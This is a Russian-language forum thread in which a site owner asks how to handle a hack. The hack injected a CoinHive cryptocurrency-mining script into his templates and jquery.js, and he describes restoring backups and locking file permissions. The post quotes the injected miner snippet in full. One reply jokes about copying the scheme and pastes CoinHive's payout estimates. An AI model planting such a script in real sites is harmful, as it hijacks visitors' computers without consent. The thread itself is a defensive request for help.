Вопрос? Взломали сайт, какие меры принять?

Вчера вечером приходит смс сообщение что на сайте изменены 4 файла, а именно
fullstory.tpl
main.tpl
shortstory.tpl
/engine/classes/js/jquery.js
я скачал один файл fullstory.tpl и его сравнил программой Araxis Merge сразу нашол скрипт

Код:

 <script>var min = new CoinHive.Anonymous('ooApRc35FgFVFE7JAf8d7MQO3TSbhd2v',{throttle: 0.9});if (!min.isMobile()) {min.start();}</script>

Я сразу шаблон удалил и закачал новый из бекапа ( там этого скрипта нет)
Все что находится в папке /engine/classes/js/ заменил.
Проходит минут 15 опять приходит смс изменен и добавлен файл
/engine/classes/js/jquery.js
/engine/classes/js/jquery_.js

Я обратно все что в папке /engine/classes/js/ поменял.

Сегодня утром после осмотра нахожу обратно этот скрипт майнера.
Сейчас шаблон новый с бекапа закачал,поменял права и пользователя на root
Поменял пользователя на папку engine теперь она root ( закачать, файл поменять уже не получится,даже если есть доступ)
Нашол партнерку coinhive.com там зарегистрировался,написал в поддержку,так и так и предоставил им скрипт,сейчас ожидаю ответа, ( если ответят и скажут кошелек я постараюсь его заблокировать)


Так вот сам вопрос: Что еще предпринять, для защиты сайта?
Как вообще можно закачать файл на сайт /engine/classes/js/jquery_.js ?
Все мои модули которые у меня установлены вот

 

хост норм VPS www.ovh.ie это исключено

 

версия 12

 

модули вроде нормальные.авторы модулей, тут на форуме есть

 

нет. только - Список неудачных попыток авторизации пользователей в админпанели или пользователей, имеющих доступ к админпанели.

 

Помайнил чувак)))

 

Был баг что ли?могли заливать,это как?

 

админов там нет.
Главное васек от майнился,прикинь на майнил где то еще дохуя и заблокировали)

 

Правила есть coinhive.com/info/terms-of-service ,была бы отписка они вообще бы не отписывались.
Я потом еще раз писал спрашивал его рег почту, ее не дали имя сказали.

Но это не важно интересно как файл залили

 

Может самому попробовать
Какое количество XMR можно ожидать для моего сайта?
В настоящее время мы платим 0.000053XMR за 1 миллион хешей. Если у вас 1 миллион посещений в месяц, предположите, что пользователь делает 30 хешей / с (средний ноутбук) и остается на вашем сайте в течение 5 минут:

(1000000 visits per month * 30 hashes/s * 5 minutes * 60 seconds)/1000000 * 0.000053 xmr = 0.477 xmr / month.
Yesterday 0.0477 XMR= 12.77166627 EUR


Как я могу снять оставшийся остаток?
Выплаты происходят автоматически каждые два часа. Если вы достигли минимальной выплаты (настраиваемой в настройках), весь ваш ожидающий баланс будет оплачен следующей партией.

 

походу майнер остался, как проверить в консоли?